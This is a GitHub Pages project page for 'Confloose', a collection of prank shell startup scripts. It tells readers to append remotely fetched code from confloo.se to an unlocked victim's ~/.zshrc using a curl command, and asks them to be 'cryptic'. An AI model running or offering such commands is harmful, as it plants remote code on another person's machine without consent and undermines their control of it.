<!doctype html>
<html>
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="chrome=1">
    <title>Confloose by Snaipe</title>

    <link rel="stylesheet" href="stylesheets/styles.css">
    <link rel="stylesheet" href="stylesheets/pygment_trac.css">
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
    <!--[if lt IE 9]>
    <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
  </head>
  <body>
    <div class="wrapper">
      <header>
        <h1>Confloose</h1>
        <p>The worst startup scripts ever</p>

        <p class="view"><a href="https://github.com/Snaipe/confloose">View the Project on GitHub <small>Snaipe/confloose</small></a></p>


        <ul>
          <li><a href="https://github.com/Snaipe/confloose/zipball/master">Download <strong>ZIP File</strong></a></li>
          <li><a href="https://github.com/Snaipe/confloose/tarball/master">Download <strong>TAR Ball</strong></a></li>
          <li><a href="https://github.com/Snaipe/confloose">View On <strong>GitHub</strong></a></li>
        </ul>
      </header>
      <section>
        <h1>
<a name="confloose" class="anchor" href="#confloose"><span class="octicon octicon-link"></span></a>Confloose</h1>

<p>A <em>confloose</em> (or "loose configuration") is a collection of the worst a startup
script can do for you.</p>

<p>There has been a prank going on from quite some time in my IT school --
when someone leaves his computer unattended, and without locking it, one would
append a script to the victim's shell startup file.</p>

<p>The deal is to put really annoying things right off the bat while not harming
the computer and the data on it -- this prank is meant as a lesson (you should
not leave your computer unattended in public space), and a fun challenge (at
least for the one watching from afar)</p>

<h2>
<a name="how-to-confloose-somebody-" class="anchor" href="#how-to-confloose-somebody-"><span class="octicon octicon-link"></span></a>How to confloose somebody :</h2>

<p><code>curl "http://confloo.se/hard" &gt;&gt; ~/.the_shell_rc</code></p>

<p>So, as an example, confloosing someone using zsh :</p>

<p><code>curl "http://confloo.se/hard" &gt;&gt; ~/.zshrc</code></p>

<h2>
<a name="rules-" class="anchor" href="#rules-"><span class="octicon octicon-link"></span></a>Rules :</h2>

<ol>
<li>Don't destroy anything.</li>
<li>Don't steal anything.</li>
<li>Try to be cryptic.</li>
<li>Be fun and creative.</li>
</ol>
      </section>
      <footer>
        <p>This project is maintained by <a href="https://github.com/Snaipe">Snaipe</a></p>
        <p><small>Hosted on GitHub Pages &mdash; Theme by <a href="https://github.com/orderedlist">orderedlist</a></small></p>
      </footer>
    </div>
    <script src="javascripts/scale.fix.js"></script>
    
  </body>
</html>